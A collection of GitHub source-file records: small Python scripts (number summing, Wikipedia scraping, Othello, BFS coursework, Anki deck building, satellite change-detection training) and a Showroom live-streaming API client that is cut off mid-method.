+{"seq_id":"28932139332","text":"import re\n\nname = input(\"Enter file:\")\nhandle = open(name)\nsum=0\nfor line in handle.readlines():\n\tnums = re.findall(\"[0-9]+\" ,line)\n\tfor num in nums:\n\t\tsum = sum + int(num) \n\t\t\nprint(sum)","repo_name":"ymlai87416/PythonPlayground","sub_path":"PythonOnline/web-assignment01/sum_num.py","file_name":"sum_num.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"71476960362","text":"\"\"\"get values from wiki site with bs4\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom validators import url as valid_url\n\nWIKI_RANDOM = 'https://ru.wikipedia.org/wiki/Special:Random'\nWIKI_DOMAIN = \"https://ru.wikipedia.org\"\nPATH = r'C:/Users/dasha/PycharmProjects/Evstratova-Darya-11-104'\n\n\ndef get_byte(url):\n \"\"\"mothod to get byte_code\"\"\"\n # Извлекаем данные из ссылки\n response = requests.get(url)\n # Переводим содержимое ссылки в байт код\n code = response.content\n return code\n\n\ndef soup_of_code(code):\n \"\"\"method get html cod\"\"\"\n # Достаем html код\n soup = BeautifulSoup(code, 'lxml')\n return soup\n\n\ndef get_urls(soup):\n \"\"\"get all url\"\"\"\n # Поиск по атрибуту и отсеивание лишнего\n new_soup = soup.select('div[class=mw-parser-output]')\n # Проверка на то, что после новый список не пустой\n if len(new_soup) == 0:\n return []\n # Выбираем из списка ссылки\n urls = new_soup[0].findAll('a')\n # Создаем список для вики ссылок\n link_wiki = []\n for elem in urls:\n # Достаем ссылку без тэгов\n link = str(elem.get(\"href\"))\n # Поверка что сссылка на страницу вики\n if '/wiki/' in link:\n url = ''.join([WIKI_DOMAIN, link])\n # Если ссылка рабочая, то дабавляем в список ссылок\n if valid_url(url):\n link_wiki.append(url)\n return link_wiki\n\ndef put_text(soup, data_cls):\n \"\"\"put words and count them\"\"\"\n # Создается объект класса\n data = data_cls()\n # Достаем текст со страниц вики с тэгами\n text = soup.find('div', class_=\"mw-parser-output\")\n # Проверяем, что на странице есть текст\n if text is None:\n return data\n # Содержимое текста\n text = text.text\n # Преобразовываем текст в список слов\n words = list(map(lambda s: s.lower().strip(), filter(lambda s: s.isalpha(), text.split())))\n # Проходимся по всем словам\n for elem in words:\n # Проверяем на наличие слова в мапе\n if elem in data:\n # Если есть, то счетчик увеличиваем\n data[elem] = data[elem] + 1\n else:\n # В противгном случае добавляем со значением один\n data[elem] = 1\n return data\n\nif __name__ == \"__main__\":\n print(get_urls(soup_of_code(get_byte(WIKI_RANDOM))))\n","repo_name":"DashaEvstratova/Evstratova-Darya-11-104-","sub_path":"src/parsers/wikipedia_parsing_bs4.py","file_name":"wikipedia_parsing_bs4.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36480612989","text":"from django.core.management.base import BaseCommand\nfrom othello2.parts.main_class import Board, PlayerCharacter\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n match = OneMatch()\n match.start()\n\n\nclass OneMatch(object):\n def __init__(self):\n self.board = Board(0x0000000810000000, 0x0000001008000000)\n self.player_black = PlayerCharacter(1, recursive_depth=6)\n self.player_white = PlayerCharacter(-1, recursive_depth=5)\n\n def start(self):\n while True:\n self.board.print_board()\n self.manual_turn(1)\n if self.board.is_game_over():\n self.board.print_board()\n break\n\n self.board.print_board()\n self.pc_turn(-1)\n if self.board.is_game_over():\n self.board.print_board()\n break\n\n def manual_turn(self, color):\n if not self.board.has_legal(color):\n print('no available positions')\n return\n while True:\n message = {1: 'black', -1: 'white'}[color]\n pos = input(f'{message} pos >>> ')\n pos = 2 ** int(pos)\n if not (self.board.get_legal_bit(color) & pos):\n print('not legal')\n continue\n self.board = self.board.put_stone(pos, color)\n break\n\n def pc_turn(self, color):\n if not self.board.has_legal(color):\n print('no available positions')\n return\n player = {1: self.player_black, -1: self.player_white}[color]\n put = player.get_best_move_bit(self.board)\n if put:\n print(self.bit_to_number(put))\n self.board = self.board.put_stone(put, color)\n\n # デバッグ用\n def print_bit(self, bit):\n tmp = format(bit, 'b').zfill(64)\n for i in range(8):\n print(tmp[i*8:i*8+8])\n print()\n\n def bit_to_number(self, bit):\n return len(format(bit, 'b')) - 1\n","repo_name":"kuryu920623/othello2","sub_path":"othello2/management/commands/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4955561399","text":"def loadGraph(edgeFilename):\r\n \"\"\"Reads in the file of edge data\"\"\"\r\n\r\n edgeFilename = open(edgeFilename)\r\n\r\n edges = {}\r\n\r\n for line in edgeFilename.readlines():\r\n from_vertex = int(line.split()[0])\r\n to_vertex = int(line.split()[1])\r\n\r\n if from_vertex not in edges:\r\n edges[from_vertex] = []\r\n\r\n edges[from_vertex].append(to_vertex)\r\n\r\n return edges\r\n\r\nclass MyQueue:\r\n def __init__(self):\r\n \"\"\"Initialize an empty queue\"\"\"\r\n self.queue = []\r\n\r\n def __str__(self):\r\n \"\"\"Displays the contents of the queue\"\"\"\r\n return str(self.queue)\r\n\r\n def enqueue(self, value):\r\n \"\"\"Storing in FIFO order\"\"\"\r\n self.queue.append(value)\r\n\r\n def dequeue(self):\r\n \"\"\"Removing in FIFO order\"\"\"\r\n if len(self.queue) == 0:\r\n raise Exception('Queue is empty!')\r\n return self.queue.pop(0)\r\n\r\n def empty(self):\r\n \"\"\"Empties the list\"\"\"\r\n if len(self.queue) == 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef BFS(G,s):\r\n \"\"\"Runs breadth-first search algorithm\"\"\"\r\n max(G.keys())\r\n\r\n d = max(G.keys()) + 1 #size of the list\r\n distance = [float('inf')] * d\r\n\r\n Q = MyQueue()\r\n\r\n distance[s] = 0\r\n Q.enqueue(s)\r\n while not Q.empty():\r\n u = Q.dequeue()\r\n if u not in G:\r\n continue\r\n for v in G[u]:\r\n if distance[v] == float('inf'):\r\n distance[v] = distance[u] + 1\r\n Q.enqueue(v)\r\n return distance\r\n\r\ndef distanceDistribution(G):\r\n \"\"\"compute the distribution of all distances in G.\"\"\"\r\n d = {}\r\n count = 0\r\n for node in G:\r\n Distances = BFS(G, node)\r\n for i in range(node + 1, len(Distances)):\r\n distance = Distances[index]\r\n if distance in d:\r\n d += 1\r\n else:\r\n count += 1\r\n for key in d:\r\n d[key] = distance/count\r\n\r\n\r\n# Test loadGraph Function\r\nprint(loadGraph('edges.txt'))\r\n\r\n# Test Queue Class\r\nQ = MyQueue()\r\nQ.enqueue(50)\r\nQ.enqueue(100)\r\nprint(Q)\r\nprint(Q.empty())\r\nQ.dequeue()\r\nprint(Q)\r\nQ.dequeue()\r\nprint(Q)\r\nprint(Q.empty())\r\n\r\n# Test BFS Function\r\nG = loadGraph('edges.txt')\r\nresult = BFS(G, 200)\r\nprint(result)\r\n\r\n# Test distanceDistribution Function\r\nG = loadGraph('edges.txt')\r\nprint(distanceDistribution(G))\r\n\r\n# To what extent does this network satisfy the small world phenomenon?\r\n# Could not get my last function. Assuming that this network satisfies the small world phenomenon\r\n# by the percentages showing that most nodes are connected in 6 degrees or less.\r\n","repo_name":"bebedactyl/Algorithms","sub_path":"swp.py","file_name":"swp.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38376067692","text":"import csv\nimport random\nimport genanki\nimport sys\n\n\nclass DeckBuilder:\n\n def basename(self, x):\n if (x == \"\"):\n return \n return (x.split('/'))[-1]\n\n # return (status,url) :\n # where status : -1 -> not found , 0 -> found , 1 -> related word found\n def build_deck(self, augments, deck_filename, deck_title, media_dir):\n anki_model_name = \"spanish-vocabulary-v1.0\"\n model_id = random.randrange(1 << 30, 1 << 31)\n style = \"\"\"\n .card {\n font-family: arial;\n font-size: 24px;\n text-align: center;\n color: black;\n background-color: white;\n }\n \"\"\"\n\n anki_model = genanki.Model(\n model_id,\n anki_model_name,\n fields=[\n {\"name\": \"Spanish\"},\n {\"name\": \"English\"},\n {\"name\": \"Lat-Am-Pronunciation\"},\n {\"name\": \"Picture\"}\n ],\n templates=[\n # only include audio in front side if it exists\n {\n \"name\": \"Audio | Text (Spanish)\",\n \"qfmt\": '

        What is \"{{Spanish}}\" in English ?

        {{#Lat-Am-Pronunciation}}{{Lat-Am-Pronunciation}}{{/Lat-Am-Pronunciation}}',\n \"afmt\": '

        {{English}}

        ',\n },\n # only include audio in backside if it exists\n {\n \"name\": \"English\",\n \"qfmt\": '

        What is \"{{English}}\" in Spanish?

        ',\n \"afmt\": '

        {{Spanish}}

        {{#Lat-Am-Pronunciation}}{{Lat-Am-Pronunciation}}{{/Lat-Am-Pronunciation}}',\n },\n {\n \"name\": \"Audio Only\",\n \"qfmt\": '

        What is this word in English?{{Lat-Am-Pronunciation}}

        ',\n \"afmt\": '

        {{English}}

        ',\n },\n {\n \"name\": \"Picture\",\n \"qfmt\": '{{Picture}}

        What is this in Spanish?

        ',\n \"afmt\": '

        {{Spanish}}

        ',\n },\n ],\n css=style,\n )\n\n # Generate the Anki Deck from the given csv file\n anki_notes = []\n anki_deck = genanki.Deck(model_id, deck_title)\n anki_package = genanki.Package(anki_deck)\n\n for row in augments:\n # Foreign\n # English\n # Pronunciation\n # Image\n card_fields = [row['Foreign'], row['English']]\n print(f\"processing {row['Foreign']} {row['English']} {row['Pronunciation']} {row['Image']}\")\n if (row['Pronunciation'] is not None):\n # audio_path = media_dir+\"/audio/\"+row[0]+\".mp3\"\n # anki_package.media_files.append(audio_path) # libro.mp3\n anki_package.media_files.append(row['Pronunciation']) # libro.mp3\n card_fields.append(\"[sound:\"+self.basename(row['Pronunciation'])+\"]\") \n else: \n card_fields.append(\"\")\n\n if (row['Image'] is not None):\n # image_path = media_dir+\"/image/\"+row[0]+\".jpg\"\n # anki_package.media_files.append(image_path) # libro.jpg\n anki_package.media_files.append(row['Image']) # libro.mp3\n card_fields.append(\"\")\n else:\n card_fields.append(\"\")\n\n anki_note = genanki.Note(\n model=anki_model,\n fields=card_fields\n )\n\n anki_notes.append(anki_note)\n\n random.shuffle(anki_notes)\n for anki_note in anki_notes:\n anki_deck.add_note(anki_note)\n\n anki_package.write_to_file(deck_filename)\n","repo_name":"matthewKeville/flash-lang","sub_path":"FlashLang/DeckBuilder.py","file_name":"DeckBuilder.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21015633431","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@Time : 2022/2/25/025 16:44\r\n@Author : NDWX\r\n@File : train.py\r\n@Software: PyCharm\r\n\"\"\"\r\nimport glob\r\nimport random\r\nimport time\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport torch\r\nfrom tqdm import tqdm\r\n\r\nfrom models.dsnunet import DSNUNet\r\nfrom utils.data_process import cal_val_f1\r\nfrom utils.opt_loader import load_opt, build_dataloader\r\nfrom utils.trick import random_scale\r\n\r\nwarnings.filterwarnings('ignore')\r\ntorch.backends.cudnn.enabled = True\r\nDEVICE = 'cuda:0' if torch.cuda.is_available() else 'cpu'\r\n\r\n\r\n# 固定随机种子\r\ndef setup_seed(seed):\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n np.random.seed(seed)\r\n random.seed(seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\n# 加载模型\r\ndef load_model(DEVICE, deep_supervision=False, pretrain=False, pretrain_model_path=None):\r\n model = DSNUNet(rgb_init=32, sar_init=8, rgb_ch=3, sar_ch=2, out_ch=2, deep_supervision=deep_supervision)\r\n model.to(DEVICE)\r\n if pretrain:\r\n model.load_state_dict(torch.load(pretrain_model_path))\r\n return model\r\n\r\n\r\n# 训练函数\r\ndef train(num_epochs, optimizer, scheduler, loss_fn, train_loader, valid_loader, model, save_path,\r\n multi_scale=False, deep_supervision=False):\r\n epochs = num_epochs + 1\r\n header = r'Epoch/EpochNum | TrainLoss | ValidF1 | Time(m)'\r\n raw_line = r'{:5d}/{:8d} | {:9.3f} | {:9.3f} | {:9.2f}'\r\n print(header)\r\n # 记录当前验证集最优mIoU,以判定是否保存当前模型\r\n best_f1 = 0\r\n best_f1_epoch = 0\r\n train_loss_epochs, val_f1_epochs, lr_epochs = [], [], []\r\n for epoch in range(1, epochs):\r\n model.train()\r\n losses = []\r\n start_time = time.time()\r\n for batch_index, (x1, x2, y) in enumerate(tqdm(train_loader)):\r\n accumulation_steps = 16 / x1.shape[0]\r\n x1, x2, y = x1.float(), x2.float(), y.long()\r\n if multi_scale:\r\n scale = random.uniform(0.7, 1.3)\r\n x1, x2, y = random_scale(x1, x2, y, x1.shape[2:], (scale, scale))\r\n x1, x2, y = x1.to(DEVICE), x2.to(DEVICE), y.to(DEVICE)\r\n if deep_supervision:\r\n loss = 0\r\n outputs = model(x1, x2)\r\n for output in outputs:\r\n loss += loss_fn(output, y)\r\n loss /= len(outputs)\r\n else:\r\n output = model(x1, x2)\r\n loss = loss_fn(output, y)\r\n loss = loss / accumulation_steps\r\n loss.backward()\r\n if ((batch_index + 1) % accumulation_steps) == 0:\r\n optimizer.step()\r\n optimizer.zero_grad()\r\n losses.append(loss.item())\r\n scheduler.step()\r\n val_f1 = cal_val_f1(model, valid_loader, deep_supervision=deep_supervision)\r\n train_loss_epochs.append(np.array(losses).mean())\r\n val_f1_epochs.append(np.mean(val_f1))\r\n lr_epochs.append(optimizer.param_groups[0]['lr'])\r\n print(raw_line.format(epoch, num_epochs, np.array(losses).mean(),\r\n np.mean(val_f1),\r\n (time.time() - start_time) / 60 ** 1), end=\"\")\r\n if best_f1 < val_f1:\r\n best_f1 = val_f1\r\n best_f1_epoch = epoch\r\n torch.save(model.state_dict(), save_path)\r\n print(\" valid F1 is improved. the model is saved.\")\r\n else:\r\n print(\"\")\r\n return train_loss_epochs, val_f1_epochs, lr_epochs\r\n\r\n\r\nif __name__ == '__main__':\r\n random_seed = 1021\r\n num_epochs = 100\r\n batch_size = 8\r\n channels = 5\r\n lr = 1e-3\r\n multi_scale = False\r\n use_style_transfer = False\r\n use_k_fold = False\r\n deep_supervision = False\r\n setup_seed(random_seed)\r\n train_dataset = [sorted(glob.glob(\"../data/train/A/*.tif\")), sorted(glob.glob(\"../data/train/B/*.tif\")),\r\n sorted(glob.glob(\"../data/train/OUT/*.tif\"))]\r\n val_dataset = [sorted(glob.glob(\"../data/val/A/*.tif\")), sorted(glob.glob(\"../data/val/B/*.tif\")),\r\n sorted(glob.glob(\"../data/val/OUT/*.tif\"))]\r\n model_save_path = \"../user_data/model_data/change_detection.pth\"\r\n train_loader, valid_loader = build_dataloader(train_dataset, val_dataset, int(batch_size), use_style_transfer)\r\n model = load_model(DEVICE, deep_supervision=deep_supervision)\r\n optimizer, scheduler, loss_fn = load_opt(model, lr)\r\n train_loss_epochs, val_mIoU_epochs, lr_epochs = train(num_epochs, optimizer, scheduler, loss_fn,\r\n train_loader, valid_loader, model, model_save_path,\r\n multi_scale=multi_scale, deep_supervision=deep_supervision)\r\n","repo_name":"NightSongs/DSNUNet","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"36580379542","text":"\"\"\"Connections Manager.\"\"\"\nimport re\nimport uuid\nimport time\nimport json\nimport datetime\n#import urllib2\n#from lxml import etree\nfrom pytz import timezone\nfrom parse import parse\n\nfrom srtools.manager.api.showroomwebservice import _ShowroomWebService\nfrom srtools.utils.loggingutils import log_error\n\nclass ShowroomAPI(_ShowroomWebService):\n \"\"\"Showroom API implementation.\"\"\"\n def query_csrf_token(self):\n \"\"\"\n :returns: The current valid CSRF token.\n :rtype: string\n \"\"\"\n return self._query_csrf_token()\n\n def set_timeout(self, room, timeout):\n \"\"\"\n Sets timeout.\n :param room: The room to know if it's official or amateur block.\n :type room: Room\n \"\"\"\n try:\n self.connections_manager.twitter_timeout[room.official] = str(timeout)\n except Exception as err:\n log_error(err)\n\n def clear_timeout(self, room):\n \"\"\"\n Clears timeout.\n :param room: The room belonging to the type to clear.\n :type room: Room\n \"\"\"\n self.connections_manager.twitter_timeout[room.official] = None\n\n def get_timeout(self, room):\n \"\"\"\n Returns timeout for given room.\n :param room: Room to check.\n :type room: Room\n :returns: When the bonus ban is lifted, None otherwise.\n :rtype: bool\n \"\"\"\n return self.connections_manager.twitter_timeout[room.official]\n\n def do_polling(self, room):\n \"\"\"\n :param room: The room to query.\n :type room: Room\n :returns: 0 if free items were obtained. 1 if broadcast ended. 2 if nothing, 3 if error.\n :rtype: int\n \"\"\"\n result = 2\n try:\n respjson = self._query_polling(room).json()\n if respjson.get('live_watch_incentive'):\n if respjson['live_watch_incentive'].get('ok') == 1:\n self.clear_timeout(room)\n result = 0\n else:\n result = 2\n else:\n if respjson.get('invalid') == 1:\n result = 1\n except ValueError as err:\n result = 3\n except Exception as err:\n result = 3\n log_error(err)\n\n return result\n\n def get_current_user(self, room):\n \"\"\"\n :param room: The room from where to extract the information.\n :type room: Room\n :returns: JSON with the information, None if error or invalid.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_current_user(room)\n if resp is not None:\n respjson = resp.json()\n\n if respjson.get('user_id') == 0 or respjson.get('errors') is not None:\n respjson = None\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_onlive_num(self):\n \"\"\"\n Gets the amount of rooms broadcasting.\n :returns: Amount of live broadcasts, -1 if failed.\n :rtype: int\n \"\"\"\n result = -1\n try:\n resp = self._query_onlive_num()\n if resp is not None:\n respjson = resp.json()\n result = respjson.get('num')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_onlives(self):\n \"\"\"\n Gets all the online rooms.\n :returns: JSON with the onlives. None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_onlives()\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_summary_ranking(self, room):\n \"\"\"\n Gets the historical top 30.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the ranking, None if not possible.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_summary_ranking(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_user_list(self, room):\n \"\"\"\n Gets the stage user list from a room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the people in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_user_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_user_list_anteroom(self, room):\n \"\"\"\n Gets the anteroom stage user list from a room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the people in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_user_list_anteroom(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_stage_gift_list(self, room):\n \"\"\"\n Gets the stage gift list from a room (towers and above).\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the gifts in the room, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_stage_gift_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_gift_list(self, room):\n \"\"\"\n Gets the gift list of the given room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with the gift list, none if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_gift_list(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_setings(self, room):\n \"\"\"\n Gets settings for the room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON with available performance types, None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_settings(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_telop(self, room):\n \"\"\"\n Gets the telop for the requested room.\n :param room: The room to query.\n :type room: Room\n :returns: The telop text if found, empty if not.\n :rtype: string\n \"\"\"\n result = ''\n try:\n resp = self._query_telop(room)\n if resp is not None:\n respjson = resp.json()\n result = respjson.get('telop')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_event_and_support(self, room):\n \"\"\"\n Gets the event information of the room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_event_and_support(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_gift_log(self, room):\n \"\"\"\n Gets the gift log from the room.\n :param room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_gift_log(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_questionnaire_result(self, room):\n \"\"\"\n Gets the result of a questionnaire.\n :param room: The room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_questionnaire_result(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n\n return respjson\n\n def get_user_profile(self, room, user):\n \"\"\"\n Gets user profile from given room.\n :param room: Room to query.\n :type room: Room\n :param user: User to query.\n :type user: User\n :returns: HTML with popup\n :rtype: string\n \"\"\"\n try:\n result = self._query_user_profile(room, user)\n except Exception as err:\n log_error(err)\n result = None\n\n return result\n\n def get_comment_log(self, room):\n \"\"\"\n Gets the room's comment log.\n :param room: Room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n respjson = None\n try:\n resp = self._query_comment_log(room)\n if resp is not None:\n respjson = resp.json()\n except Exception as err:\n log_error(err)\n respjson = None\n\n return respjson\n\n def get_banners(self, room):\n \"\"\"\n Gets the banners of the room.\n :param room: Room to query.\n :type room: Room\n :returns: JSON, or None if failed.\n :rtype: string\n \"\"\"\n try:\n result = self._query_banners(room)\n except Exception as err:\n log_error(err)\n result = None\n\n return result\n\n def refresh_token(self):\n \"\"\"\n Updates the csrf token if necessary.\n :returns: Whether a new token was obtained or not.\n :rtype: bool\n \"\"\"\n result = False\n try:\n resp = self.connections_manager.get(\"https://www.showroom-live.com\")\n token = re.search('name=\"csrf_token\" value=\"([^\"]*)\"', resp.content).groups()[0]\n\n if self.query_csrf_token() != token:\n print(f\"Refreshing csrf_token from {self.query_csrf_token()} to {token}.\")\n self.current_csrf_token = token\n else:\n print(f\"Current csrf_token {self.query_csrf_token()} still valid.\")\n\n result = True\n\n except Exception as _err:\n print(f\"Could not refresh csrf_token, using default {self.query_csrf_token()}.\")\n\n return result\n\n def can_get_bonus(self, room):\n \"\"\"\n Check whether bonus can be obtained.\n :param room: The room from where to check.\n :type room: Room\n :returns: True if it can be obtained, False otherwise.\n :rtype: bool\n \"\"\"\n if not self.connections_manager.forbidden:\n result = True\n\n if self.connections_manager.twitter_timeout[room.official] is not None:\n japan_time = datetime.datetime.now(tz=timezone('Asia/Tokyo')).time()\n\n result = (self.connections_manager.twitter_timeout[room.official] < japan_time)\n if result:\n self.connections_manager.twitter_timeout[room.official] = None\n else:\n result = False\n\n return result\n\n def is_online(self, room_id):\n \"\"\"\n Checks if the given room is online.\n :param room_id: The room id to query.\n :type room_id: int\n :returns: True if it's online, False otherwise.\n :rtype: bool\n \"\"\"\n result = False\n try:\n resp = self._query_is_online(room_id)\n if resp is not None:\n respjson = resp.json()\n result = (respjson.get('ok') == 1)\n #result = (respjson.get('live_status') == 2)\n except Exception as err:\n log_error(err)\n\n return result\n\n def login(self, username, password):\n \"\"\"Login.\"\"\"\n result = False\n\n try:\n if self.refresh_token():\n\n resp = self._query_login(username, password)\n if resp is not None:\n respjson = resp.json()\n if respjson.get(\"ok\") == 1:\n result = True\n elif respjson.get(\"error\") == 'Already logged in.':\n result = True\n\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_live(self, room, lives_manager):\n \"\"\"\n Returns broadcast id from given room.\n :param room: The room to query.\n :type room: Room\n :param lives_manager: Current lives manager.\n :type lives_manager: LivesManager\n :returns: Live object.\n :rtype: Live\n \"\"\"\n result = None\n try:\n if self.is_online(room.room_id):\n data = self._query_live_data(room).json()\n live_id = int(data['live_id'])\n result = lives_manager.find(live_id)\n\n if result is None:\n result = lives_manager.create(live_id)\n\n room.live = result\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_live_data(self, room, lives_manager):\n \"\"\"\n Returns broadcast information from given room.\n :param room: The room to query.\n :type room: Room\n :param lives_manager: Current lives manager.\n :type lives_manager: LivesManager\n :returns: Live object.\n :rtype: Live\n \"\"\"\n result = None\n try:\n respjson = None\n\n if self.is_online(room.room_id):\n resp = self._query_live_data(room)\n if resp is not None:\n respjson = resp.json()\n live_id = int(respjson['live_id'])\n result = lives_manager.find(live_id)\n\n if result is None:\n result = lives_manager.create(live_id)\n\n lives_manager.refresh(result, respjson)\n except Exception as err:\n log_error(err)\n\n return result\n\n def send_comment(self, live, comment, max_tries=5, delay=1):\n \"\"\"\n Sends the given comment to the given broadcast.\n :param live: Live object where to send the comment.\n :type live: Live\n :param comment: Comment to send.\n :type comment: string\n :param max_tries: Maximum amount of tries to send the comment.\n :type max_tries: int\n :returns: True if it could be sent, False otherwise.\n :rtype: bool\n \"\"\"\n result = False\n if max_tries < 1:\n max_tries = 1\n\n while not result and max_tries > 0:\n max_tries -= 1\n\n try:\n resp = self._query_comment(live, comment)\n respjson = resp.json()\n result = (respjson.get('ok') == 1)\n if not result:\n print(respjson)\n if respjson.get('errors'):\n if (respjson['errors'][0].get('error_user_msg') == \\\n 'This show has already ended.') or \\\n (respjson['errors'][0].get('error_user_msg') == \\\n 'Commenting is not available') :\n break\n elif respjson['errors'][0].get('error_user_msg') == 'Please try again.':\n time.sleep(delay)\n except Exception as err:\n log_error(err)\n\n return result\n\n def parse_timeout_error(self, room, error_message):\n \"\"\"\n Parse error message and set timeout.\n :param room: Room from where to check.\n :type room: Room\n :param error_message: Error message to parse.\n :type error_message: string\n \"\"\"\n try:\n waiting = parse(\"You can get free gifts until {}.\", error_message)\n if waiting:\n self.set_timeout(room, datetime.datetime.strptime(waiting[0], \"%H:%M\").time())\n except Exception as err:\n log_error(err)\n\n def send_tweet(self, room, comment=None):\n \"\"\"\n Send tweet from the current room.\n :param room: The room from where to tweet.\n :type room: Room\n :param comment: The comment to send.\n :type comment: string\n :returns: True if bonus was gotten, False otherwise.\n :rtype: bool\n \"\"\"\n result = False\n\n if comment is None:\n uuid_value = str(uuid.uuid4())\n tweet_default = room.live.tweet_default if room.live and room.live.tweet_default \\\n else room.name + \" Broadcasting!\\n\"\n comment = tweet_default + uuid_value if len(tweet_default) + len(uuid_value) < 140 \\\n else tweet_default[:-36] + uuid_value\n\n resp = self._query_tweet(room, comment)\n try:\n respjson = resp.json()\n if respjson.get('ok') == 1:\n room.badge = True\n\n # {u'add': 1, u'ok': 1}\n # {u'add': 0, u'ok': 1}\n result = (respjson.get('add') == 1)\n if result:\n self.clear_timeout(room)\n else:\n # {u'api_error': 1, u'error': u'You can get free g...il 02:54.'}\n if respjson.get('api_error') == 1:\n if (respjson['error'] != u'\\u6295\\u7a3f\\u306b\\u5931\\u6557\\u3057\\u307e\\u3057\\u305f\\u3002') and (respjson['error'] != \"posting failed\"):\n self.parse_timeout_error(room, respjson['error'])\n except Exception as err:\n log_error(err)\n\n return result\n\n def update_profile(self, profile_configuration):\n \"\"\"\n :param profile_configuration: Configuration to use.\n :type profile_configuration: ProfileConfiguration\n :returns: True if the profile could be updated, False otherwise.\n :rtype: bool\n \"\"\"\n try:\n result = False\n if profile_configuration.avatar_id != None and profile_configuration.name != None:\n resp = self._query_profile(profile_configuration)\n result = (resp.url == u'https://www.showroom-live.com/user/my_profile_edit_done')\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_next_live(self, room_id):\n \"\"\"\n :param room_id: Room to check.\n :type room_id: int\n :returns: The scheduled date for next broadcast, None if not available.\n :rtype: datetime.datetime\n \"\"\"\n result = None\n try:\n resp = self._query_next_live(room_id)\n if resp is not None:\n result = resp.json().get('epoch')\n\n if result is not None:\n result = datetime.datetime.fromtimestamp(result)\n except Exception as err:\n log_error(err)\n\n return result\n\n def throw_free_gift(self, live, gift_id, num):\n \"\"\"\n Throw free gift to given live.\n :param live: Live where to throw the gift.\n :type live: Live\n :param gift_id: Gift id to throw.\n :type gift_id: int\n :param num: Amount of items to throw.\n :type num: int\n \"\"\"\n result = None\n try:\n resp = self._query_gifting_free(live, gift_id, num)\n if resp is not None:\n respjson = resp.json()\n if respjson.get('ok'):\n text = {\n 'ok': respjson['ok'],\n 'level': respjson['fan_level']['fan_level'],\n 'point': respjson['fan_level']['contribution_point'],\n 'levelup': respjson['notify_level_up'],\n 'gift_id': respjson['gift_id'],\n 'remaining': respjson['remaining_num']\n }\n\n result = json.loads(json.dumps(text))\n elif respjson.get('errors'):\n result = respjson\n log_error('Errors (%s)' % respjson.get('errors'))\n elif respjson.get('error'):\n result = respjson\n log_error('Error (%s)' % respjson.get('error'))\n\n except Exception as err:\n log_error(err)\n\n return result\n\n def throw_paid_gift(self, live, gift_id, num):\n \"\"\"\n Throw paid gift to given live.\n :param live: Live where to throw the gift.\n :type live: Live\n :param gift_id: Gift id to throw.\n :type gift_id: 